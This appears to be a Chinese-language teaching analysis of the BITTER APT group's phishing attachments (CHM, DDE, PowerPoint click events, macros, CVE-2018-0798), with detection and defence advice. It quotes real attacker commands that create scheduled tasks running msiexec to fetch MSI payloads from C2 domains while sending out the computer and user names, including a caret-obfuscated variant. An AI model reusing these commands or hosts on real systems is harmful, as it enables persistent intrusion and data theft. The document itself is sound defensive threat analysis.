APT组织“蔓灵花”恶意邮件附件5种手法分析
字数 1457
更新时间 2025-08-23 02:00:56
APT组织"蔓灵花"恶意邮件附件手法分析教学文档
一、组织背景
蔓灵花组织(BITTER、APT-C-08、苦象、T-APT-17):
- 据称有南亚背景的APT组织
- 活跃时间:自2013年11月起
- 主要目标国家:巴基斯坦和中国
- 攻击目标:政府部门、电力行业、军工业相关单位
- 主要意图:窃取敏感资料
二、攻击手法概述
蔓灵花组织主要通过钓鱼邮件传播恶意附件,最终目的多为:
- 创建计划任务(定时15-25分钟执行一次)
- 使用msiexec请求C2服务器远程加载恶意".msi"文件
- 请求时带上计算机名和用户名
- C2后台根据这些信息创建空白文件夹
- 攻击者筛选目标后放入".msi"文件
- 下次计划任务执行时完成恶意远程加载
三、五种恶意附件手法详解
手法1:恶意".chm"文件投放
特点:
- 2021年初开始常见
- 使用受控的".gov"邮箱账号传播
- 附件为包含".chm"恶意文件的压缩包
恶意代码功能:
- 创建计划任务
- 每隔17分钟远程加载一次恶意资源
- 上传主机名和用户名
请求示例:
http://comnmsgwrapsvc.net/ver/verif.php/?h=%computername%*%username%
http://folkmusicstreams.com/TIME/mac.php?sit=%computername%*%username%
技术细节:
- 使用msiexec远程加载
- msiexec特点:
- 命令行工具,用于安装、修复、卸载Windows Installer软件包
- 支持远程资源安装
- 下载到临时目录安装,完成后删除
- 流量中User-Agent固定为"Windows Installer"
检测方法:
- 流量分析检测msiexec远程http资源加载
- 监控User-Agent为"Windows Installer"的请求
手法2:恶意"DDE"隐藏域代码执行
特点:
- 投递带有恶意DDE auto的".docx"文档
- 文档打开时显示空白或迷惑性内容
- 需要查看域代码才能发现恶意内容
查看方法:
- 文件 → 选项 → 视图
- 勾选"显示文档内容" → "域代码"
恶意代码示例:
- 域代码显示为十进制数
- 转换为ASCII文本后为计划任务命令:
cmd /c msiexec.exe /i http://nesiallservice.net/chq/stall.msi /q
关联组织:
- APT-Q-42腾云蛇组织也使用过类似手法
手法3:".ppt"文件PowerPoint单击鼠标事件
特点:
- 下发恶意".PPT"文件
- 在图片上设置鼠标单击事件
- 触发后创建计划任务远程加载恶意msi资源
示例代码:
cmd.exe /c schtasks /create /sc minute /mo 15 /tn AudioDg /f /tr "%coMSPec% /c start /min msiexec /i http://farleysmxpph.com/FOXX/far.php?ptu=%computername%*%username% /qn /norestart"
手法4:文档宏病毒
特点:
- 下发携带恶意宏的文件
- 相对少见(需要用户启用宏)
- 可能设置密码保护
分析方法:
- 启用宏后,进入开发工具 → VB编辑器
- 若存在密码,使用VBA_Password_Bypasser工具解密
- 分析解密后的恶意代码功能
手法5:CVE-2018-0798公式编辑器漏洞利用
特点:
- 下发携带漏洞的".xlsx"文件
- CVE-2018-0798利用成功率较高
恶意行为:
- 进程释放后创建计划任务
- 远程加载恶意代码
示例命令:
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 15 /TN \Windows\DWM\DWMCORE /TR "cmd /c start /min ms^iex^ec /i htt^p^:^//alf^ieh^eal^thc^ares^erv^ice^.^com/AL/al.php/?dt=%computername% /q" /f
四、后续载荷演变
- 2023年5月前:常见为"wmRAT"远控
- 2023年5月首次曝光:使用"白加黑"ORPCBackdoor后门
五、防御建议
-
邮件安全:
- 警惕不明来源邮件,特别是".gov"邮箱发送的
- 谨慎处理压缩包附件
-
文档处理:
- 禁用宏执行
- 不轻易启用文档内容
- 注意空白文档或异常文档
-
系统监控:
- 监控计划任务创建行为
- 特别关注15-25分钟间隔的任务
-
网络流量:
- 检测msiexec远程加载行为
- 监控User-Agent为"Windows Installer"的请求
-
漏洞防护:
- 及时修补公式编辑器等漏洞
- 保持Office软件更新
-
取证分析:
- 注意msi文件不会在本地留存
- 重点进行流量分析和内存取证
相似文章
相似文章